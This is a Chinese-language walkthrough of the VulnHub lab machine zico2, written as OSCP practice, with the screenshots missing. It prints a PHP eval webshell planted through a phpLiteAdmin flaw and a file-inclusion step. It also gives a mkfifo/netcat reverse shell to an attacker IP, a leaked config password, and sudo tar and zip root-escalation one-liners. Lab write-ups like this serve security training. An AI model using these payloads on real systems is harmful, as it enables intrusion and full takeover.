tar、zip命令提权—zico2

【oscp】tar、zip命令提权—zico2

本次靶机为zico2,oscp类型的主要利用的是tar命令和zip命令的提权

下载链接:https://download.vulnhub.com/zico/zico2.ova

主机发现 && 80探测

image-20250111032059953

nmap全端口扫描

image-20250111032209096

image-20250111032333898

dirb目录扫描

image-20250111032415513

image-20250111032730914

标题包含的版本信息

image-20250111032740358

漏洞检索,此版本有一个远程命令执行漏洞

image-20250111032831953

查看内容

image-20250111032957534

根据提示来

image-20250111033438983

输入admin密码后,进入后台

image-20250111033543727

编写一个poc.php

image-20250111033643206

记好了这个“数据库”(一句话木马的php文件)的绝对路径 /usr/databases/poc.php

image-20250111033806667

填写名称和字段数

image-20250111033853946

写好我们的payload

 <?php @eval($_POST[cmd])?>

image-20250111034124689

看到提示说明我们创建成功了

image-20250111034217172

github上是让我们复制一个文件到根目录就可以了,但是我们没有命令执行

image-20250111034425542

继续信息收集,一句话木马已经上传成功了

image-20250111034700020

点着点着也就发现这个可能存在漏洞点

image-20250111034741657

这个,不就是文件包含嘛,试试

image-20250111034806923

普通的文件包含,利用成功

image-20250111034906139

有了文件包含,还有我们的脚本文件的路径,那么就有思路了,包含我们的“数据库”

/usr/databases/poc.php

image-20250111035123654

kali开启监听,准备反弹shell

image-20250111035200112

反弹shell(其他的都不行)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.111.128 6666 >/tmp/f

image-20250111040633381

成功

image-20250111040655540

创建交互式终端

python -c "import pty; pty.spawn('/bin/bash');"

image-20250111040914320

内网信息收集,低版本的ubuntu系统,首先想到的就是内核提权

image-20250111041040497

漏洞检索

image-20250111041223205

提权失败

image-20250111041830703

继续信息收集

image-20250111041946642

joomla内容管理系统的配置文件中,FBVtggIk5lAzEU9H,利用su切换zico用户,失败

image-20250111042343466

wordpress内容管理系统的配置文件,切换用户成功

image-20250111042536075

image-20250111042712370

有了密码,就可以利用sudo了,可以看到这个用户是可以利用sudo进行提权的,要用到tar命令或者zip

image-20250111042915172

找找suid文件

image-20250111043036449

那么就利用tar命令提权了

 sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

image-20250111043248616

zip+sudo提权

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'

image-20250111043659854

往期推荐

【oscp】靶机-election

【oscp】sudo的上级目录提权,靶机SkyTower

【oscp】稀有靶机-Readme

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了

【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞17 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容